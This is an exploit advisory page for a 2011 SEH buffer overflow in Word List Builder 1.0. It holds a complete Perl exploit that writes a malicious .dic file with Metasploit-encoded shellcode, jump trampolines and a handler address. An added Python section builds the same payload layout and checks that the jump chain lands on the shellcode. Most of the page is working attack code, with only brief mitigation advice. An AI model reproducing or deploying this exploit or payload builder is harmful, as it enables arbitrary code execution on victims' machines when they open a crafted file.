Vendor: Word List Builder
Author: h1ch4m (Hicham Oumounid)
CVSS: 7.8 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Word List Builder
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:word_list_builder:word_list_builder:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win XP SP3 French
Year: 2011

Word List Builder Buffer Overflow Exploit (SEH)

A buffer overflow vulnerability exists in Word List Builder 1.0 when a specially crafted .dic file is opened. The application copies the file contents into a fixed-size buffer without checking their length, so an oversized file overwrites the stack up to and including a Structured Exception Handler record (the exploit below places its nSEH/SEH overwrite at offset 4108). Once the overflow triggers an exception, the overwritten handler address is executed, which lets an attacker who convinces a user to open the file run arbitrary code in the context of the application, i.e. with that user's privileges.

Mitigation:

Update to the latest version of Word List Builder (the vendor has released a fix, see "Patch Exists" above). Until then, do not open .dic files from untrusted sources, since the bug requires the victim to open the file.

Exploit-DB raw data:

# Exploit Title: Word List Builder Buffer Overflow Exploit(SEH)
# Software Link: http://download.cnet.com/Word-List-Builder/3000-18541_4-10398336.html
# Version: 1.0
# triggering details : open .dic file
# Tested on: Win XP SP3 French
# Date: 31/03/2011
# Author: h1ch4m (Hicham Oumounid)
# Email: h1ch4m@live.fr
# Home: http://net-effects.blogspot.com

use strict;
use warnings;

my $file = "exploit.dic";

# Offset from the start of the file to the nSEH field of the SEH record that
# the overflow overwrites. Shellcode and its trampoline sit just before it.
my $size = 4108;

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xda\xdd\xbf\xb0\x1a\x64\x4f\xd9\x74\x24\xf4\x58\x31\xc9" .
                "\xb1\x32\x31\x78\x17\x83\xc0\x04\x03\xc8\x09\x86\xba\xd4" .
                "\xc6\xcf\x45\x24\x17\xb0\xcc\xc1\x26\xe2\xab\x82\x1b\x32" .
                "\xbf\xc6\x97\xb9\xed\xf2\x2c\xcf\x39\xf5\x85\x7a\x1c\x38" .
                "\x15\x4b\xa0\x96\xd5\xcd\x5c\xe4\x09\x2e\x5c\x27\x5c\x2f" .
                "\x99\x55\xaf\x7d\x72\x12\x02\x92\xf7\x66\x9f\x93\xd7\xed" .
                "\x9f\xeb\x52\x31\x6b\x46\x5c\x61\xc4\xdd\x16\x99\x6e\xb9" .
                "\x86\x98\xa3\xd9\xfb\xd3\xc8\x2a\x8f\xe2\x18\x63\x70\xd5" .
                "\x64\x28\x4f\xda\x68\x30\x97\xdc\x92\x47\xe3\x1f\x2e\x50" .
                "\x30\x62\xf4\xd5\xa5\xc4\x7f\x4d\x0e\xf5\xac\x08\xc5\xf9" .
                "\x19\x5e\x81\x1d\x9f\xb3\xb9\x19\x14\x32\x6e\xa8\x6e\x11" .
                "\xaa\xf1\x35\x38\xeb\x5f\x9b\x45\xeb\x07\x44\xe0\x67\xa5" .
                "\x91\x92\x25\xa3\x64\x16\x50\x8a\x67\x28\x5b\xbc\x0f\x19" .
                "\xd0\x53\x57\xa6\x33\x10\xa9\x57\x8e\x8c\x3e\xce\x7b\xed" .
                "\x22\xf1\x51\x31\x5b\x72\x50\xc9\x98\x6a\x11\xcc\xe5\x2c" .
                "\xc9\xbc\x76\xd9\xed\x13\x76\xc8\x8d\xf2\xe4\x90\x51";

# E9 rel32: near jump back 228 bytes (223 bytes of shellcode + this 5-byte
# instruction), so execution lands exactly on the first shellcode byte.
my $jump = "\xe9\x1c\xff\xff\xff";

# nSEH: EB F9 = short jump back 7 bytes (2 for this instruction + 5 for $jump),
# i.e. onto $jump. The trailing \xff\xff only pad the field to 4 bytes.
my $nseh = "\xeb\xf9\xff\xff";

# SEH: address of a pop eax / pop edx / ret sequence in word_builder.exe. After
# the ret, the CPU executes the nSEH bytes as code. Stored little-endian (pack 'V').
my $seh = pack('V', 0x00402AAF);

# NOP sled fills everything before shellcode + $jump, so $nseh starts at $size.
my $junk = "\x90" x ($size - length($shellcode . $jump));

open(my $FILE, '>', $file) or die "Cannot create $file: $!";
binmode($FILE);   # raw bytes: no newline translation on Windows
print $FILE $junk . $shellcode . $jump . $nseh . $seh;
close($FILE);
print "File created successfully: $file\n";
sleep(1);
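The layout the script above relies on (NOP sled, shellcode, 5-byte near jump, nSEH short jump, SEH pop/pop/ret) is easy to get wrong by a single byte, and the Perl hard-codes both jump encodings. The following Python is an added example, not part of the original exploit or of Word List Builder: it derives the two relative jumps from the shellcode length, assembles the same layout, and then traces the jump chain byte-for-byte to confirm that execution starting at nSEH ends on the first shellcode byte. It takes the offsets from the page (nSEH at 4108, handler 0x00402AAF) and substitutes a constructed 223-byte INT3 filler for the real payload; no target binary is needed to run it.

```python
import struct

# --- x86 relative-jump encoders ------------------------------------------------
def rel32_jmp(distance):
    """E9 rel32: 5-byte near jump. distance is counted from the END of the instruction."""
    return b"\xe9" + struct.pack("<i", distance)

def short_jmp(distance):
    """EB rel8: 2-byte short jump. distance is counted from the END of the instruction."""
    return b"\xeb" + struct.pack("<b", distance)

# --- payload builder -----------------------------------------------------------
def build_seh_payload(shellcode, nseh_offset, seh_handler, pad=b"\x90"):
    """
    Lay out [pad][shellcode][jmp rel32 -> shellcode][nSEH: jmp short -> jmp rel32][SEH]
    so that after the handler's pop/pop/ret the CPU executes nSEH, hops back onto
    the near jump, and from there lands on the first shellcode byte.
    """
    jump_back = rel32_jmp(-(len(shellcode) + 5))           # ends right before nSEH
    nseh = short_jmp(-(2 + len(jump_back))) + b"\xff\xff"  # 2 filler bytes -> 4-byte field
    seh = struct.pack("<I", seh_handler)                   # little-endian, like Perl pack('V')
    pad_len = nseh_offset - len(shellcode) - len(jump_back)
    if pad_len < 0:
        raise ValueError("shellcode plus trampoline does not fit before nSEH")
    payload = pad * pad_len + shellcode + jump_back + nseh + seh
    if len(payload) != nseh_offset + 8:
        raise RuntimeError("layout error: nSEH/SEH not at the expected offset")
    return payload

# --- jump-chain tracer (follows only EB/E9, which is all the trampolines use) ---
def trace_jumps(buf, start, max_hops=8):
    """Return the offset of the first non-jump instruction reached from `start`."""
    ip = start
    for _ in range(max_hops):
        op = buf[ip]
        if op == 0xEB:                                     # short jump
            ip = ip + 2 + struct.unpack_from("<b", buf, ip + 1)[0]
        elif op == 0xE9:                                   # near jump
            ip = ip + 5 + struct.unpack_from("<i", buf, ip + 1)[0]
        else:
            return ip
    raise RuntimeError("jump chain does not terminate")

# --- parameters taken from the exploit on this page ----------------------------
NSEH_OFFSET = 4108          # $size in the Perl script
SEH_HANDLER = 0x00402AAF    # pop eax / pop edx / ret in word_builder.exe
# Constructed stand-in: same length as the 223-byte windows/exec payload above.
FAKE_SHELLCODE = b"\xcc" * 223

def shellcode_start(payload, nseh_offset=NSEH_OFFSET):
    """Where the chain actually lands, for comparison with where shellcode was placed."""
    return trace_jumps(payload, nseh_offset)

if __name__ == "__main__":
    payload = build_seh_payload(FAKE_SHELLCODE, NSEH_OFFSET, SEH_HANDLER)
    landing = shellcode_start(payload)
    expected = NSEH_OFFSET - len(FAKE_SHELLCODE) - 5
    print(f"file size {len(payload)}, chain lands at {landing}, shellcode at {expected}")
    with open("exploit_check.dic", "wb") as fh:    # hypothetical output name
        fh.write(payload)
```

Two details worth noticing: the near jump distance is the shellcode length plus its own 5 bytes because x86 relative displacements are measured from the next instruction, and the handler address 0x00402AAF contains a null high byte, which the layout places as the very last byte of the file, so a parser that stops at the first NUL still sees the whole overwrite.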